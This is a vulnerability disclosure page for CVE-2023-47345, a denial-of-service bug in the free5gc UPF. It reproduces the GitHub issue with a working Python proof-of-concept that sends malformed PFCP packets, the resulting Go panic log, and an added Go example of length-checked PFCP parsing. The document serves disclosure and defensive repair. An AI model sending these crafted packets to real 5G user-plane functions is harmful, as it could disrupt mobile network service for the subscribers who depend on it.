CVE-2023-47345: [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero · Issue #483 · free5gc/free5gc

Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.


[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero

Describe the bug

While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when sending a malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause a DoS of any UPF instance; all memory issues due to this kind of PFCP message are caught by the Go memory runtime, which causes a panic and crash.

To Reproduce

Steps to reproduce the behavior:

  1. Build the UPF from source
  2. Run bin/upf with the default config/upfcfg.yaml
  3. Run the following PoC Python script

#!/usr/bin/env python3

import socket

udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.settimeout(1.0)

# Well-formed PFCP Association Setup Request (Node ID 10.100.200.100), sent first so the UPF registers the peer
pfcp_association_setup_request = b'\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00'

# PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero
pfcp_heartbeat_request = b'\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4'

udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as exception:
    print(f"Receive failed: {exception}")

udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8', 8805))
try:
    udp_socket.recv(65535)
except Exception as exception:
    print(f"Receive failed: {exception}")

udp_socket.close()

Expected behavior

Anyone could leverage this to cause DoS and resource consumption against a pool of UPFs. As far as possible, check the IE length of PFCP messages, update the handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of the free5gc UPF.

Screenshots

No special screenshot is provided.

Environment (please complete the following information):

  • free5GC Version: v3.3.0
  • OS: Ubuntu 20.04
  • Kernel version: 5.4.5-050405-generic
  • go version: go1.21.1 linux/amd64

Trace File

Configuration File

No specific configuration is required.

PCAP File

No specific pcap file is provided.

Log File

time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version: \n\tNot specify ldflags (which link version) during go build\n\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from [upfcfg.yaml]" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(*factory.Config)(0xc0000147d0)({\n\tVersion: (string) (len=5) \"1.0.3\",\n\tDescription: (string) (len=31) \"UPF initial local configuration\",\n\tPfcp: (*factory.Pfcp)(0xc00006f170)({\n\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\tNodeID: (string) (len=9) \"127.0.0.8\",\n\t\tRetransTimeout: (time.Duration) 1s,\n\t\tMaxRetrans: (uint8) 3\n\t}),\n\tGtpu: (*factory.Gtpu)(0xc00006f320)({\n\t\tForwarder: (string) (len=5) \"gtp5g\",\n\t\tIfList: ([]factory.IfInfo) (len=1 cap=1) {\n\t\t\t(factory.IfInfo) {\n\t\t\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\t\t\tType: (string) (len=2) \"N3\",\n\t\t\t\tName: (string) \"\",\n\t\t\t\tIfName: (string) \"\",\n\t\t\t\tMTU: (uint32) 0\n\t\t\t}\n\t\t}\n\t}),\n\tDnnList: ([]factory.DnnList) (len=1 cap=1) {\n\t\t(factory.DnnList) {\n\t\t\tDnn: (string) (len=8) \"internet\",\n\t\t\tCidr: (string) (len=12) \"10.60.0.0/24\",\n\t\t\tNatIfName: (string) \"\"\n\t\t}\n\t},\n\tLogger: (*factory.Logger)(0xc000022e40)({\n\t\tEnable: (bool) true,\n\t\tLevel: (string) (len=4) \"info\",\n\t\tReportCaller: (bool) false\n\t})\n})\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to [info]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to [false]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder [gtp5g]" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \"127.0.0.8:2152\"" CAT="Main" NF="UPF"
time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range [6:4]\ngoroutine 6 [running]:\nruntime/debug.Stack()\n\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\npanic({0x84f480?, 0xc0001c4318?})\n\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/ie/ie.go:637 +0x185\ngithub.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/message/heartbeat-request.go:101 +0xb3\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/message/message.go:117 +0x325\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\ncreated by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start in goroutine 1\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
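The IE-length validation the report asks for under "Expected behavior", as an added example that is not code from the issue, from free5gc or from go-pfcp: a small Go parser for the PFCP header and IE list that checks every Length field against the bytes actually present, and the fixed 4-byte size of the Recovery Time Stamp IE, before it slices, fed the two datagrams from the PoC script above. `Parse`, `parseIEs`, `fixedIELen` and `naiveIECount` are names chosen here; `naiveIECount` is a hypothetical unchecked TLV loop standing in for the general failure mode and is not a reproduction of go-pfcp's `ParseMultiIEs`. The IE type codes in the comments (60 Node ID, 96 Recovery Time Stamp, 43 UP Function Features) are from 3GPP TS 29.244.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// ErrMalformed marks a datagram the server should log and drop instead of letting a panic kill its PFCP goroutine.
var ErrMalformed = errors.New("pfcp: malformed message")

// fixedIELen lists IE types (3GPP TS 29.244 codes) whose payload has exactly one legal length;
// IEs not listed only get the generic "Length fits in the buffer" check.
var fixedIELen = map[uint16]int{96: 4} // Recovery Time Stamp: 32-bit NTP seconds

type IE struct {
	Type    uint16
	Payload []byte
}

type Message struct {
	Type uint8
	Seq  uint32
	IEs  []IE
}

// Parse decodes a PFCP header plus its IEs, checking each length field against
// the bytes actually present before slicing with it.
func Parse(b []byte) (*Message, error) {
	if len(b) < 8 {
		return nil, fmt.Errorf("%w: %d bytes, header needs 8", ErrMalformed, len(b))
	}
	length := int(binary.BigEndian.Uint16(b[2:4])) // counts everything after the Length field
	if length > len(b)-4 {
		return nil, fmt.Errorf("%w: Length %d but only %d bytes follow", ErrMalformed, length, len(b)-4)
	}
	body, off := b[4:4+length], 4 // 3-byte sequence number + 1 spare byte,
	if b[0]&0x01 != 0 {           // preceded by an 8-byte SEID when the S flag is set
		off += 8
	}
	if len(body) < off {
		return nil, fmt.Errorf("%w: %d-byte body cannot hold the SEID/sequence fields", ErrMalformed, len(body))
	}
	ies, err := parseIEs(body[off:])
	if err != nil {
		return nil, err
	}
	seq := uint32(body[off-4])<<16 | uint32(body[off-3])<<8 | uint32(body[off-2])
	return &Message{Type: b[1], Seq: seq, IEs: ies}, nil
}

// parseIEs walks the TLV list; vendor-specific IEs carry their Enterprise ID inside the payload, so the same rules cover them.
func parseIEs(b []byte) ([]IE, error) {
	var ies []IE
	for len(b) > 0 {
		if len(b) < 4 {
			return nil, fmt.Errorf("%w: %d trailing bytes, IE header needs 4", ErrMalformed, len(b))
		}
		t, l := binary.BigEndian.Uint16(b[0:2]), int(binary.BigEndian.Uint16(b[2:4]))
		if l > len(b)-4 {
			return nil, fmt.Errorf("%w: IE %d claims %d bytes, %d available", ErrMalformed, t, l, len(b)-4)
		}
		if want, fixed := fixedIELen[t]; fixed && l != want { // the PoC heartbeat fails here: IE 96, Length 0
			return nil, fmt.Errorf("%w: IE %d has length %d, must be %d", ErrMalformed, t, l, want)
		}
		ies, b = append(ies, IE{Type: t, Payload: b[4 : 4+l]}), b[4+l:]
	}
	return ies, nil
}

// naiveIECount is a hypothetical unchecked TLV loop that trusts Length. On the PoC it accepts the
// zero-length IE, then reads the four timestamp bytes as an IE header whose Length (0xe7b4) runs past
// the buffer and panics; recover() turns that panic into the returned flag.
func naiveIECount(b []byte) (n int, panicked bool) {
	defer func() { panicked = recover() != nil }()
	for len(b) > 0 {
		b, n = b[4+int(binary.BigEndian.Uint16(b[2:4])):], n+1
	}
	return n, false
}

// The two datagrams from the issue's PoC script.
var (
	AssocSetupPoC = []byte{0x20, 0x05, 0x00, 0x1f, 0x00, 0x00, 0x01, 0x00,
		0x00, 0x3c, 0x00, 0x05, 0x00, 0x0a, 0x64, 0xc8, 0x64, // Node ID (60): IPv4 10.100.200.100
		0x00, 0x60, 0x00, 0x04, 0xe8, 0x1f, 0xdc, 0x30, // Recovery Time Stamp (96), Length 4
		0x00, 0x2b, 0x00, 0x06, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00} // UP Function Features (43)
	HeartbeatPoC = []byte{0x20, 0x01, 0x00, 0x0c, 0x00, 0x00, 0x02, 0x00,
		0x00, 0x60, 0x00, 0x00, 0xe8, 0x1f, 0xe7, 0xb4} // Recovery Time Stamp, Length mutated to 0
)

func main() {
	for _, pkt := range [][]byte{AssocSetupPoC, HeartbeatPoC} {
		m, err := Parse(pkt)
		fmt.Printf("parsed=%+v err=%v\n", m, err)
	}
	fmt.Println(naiveIECount(HeartbeatPoC[8:]))
}
```

Run it with `go run`: the checked parser accepts the Association Setup Request (type 5, sequence 1, three IEs) and returns an error for the heartbeat, which a server can log and drop while it keeps serving; the unchecked loop panics on the same bytes. The useful property is that the rejection happens before any slice is taken with an attacker-supplied length, so a `recover()` in the receive goroutine becomes a last line of defence rather than the only one.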

Related news

GHSA-6944-6pmv-6mp2: free5gc Buffer Overflow vulnerability

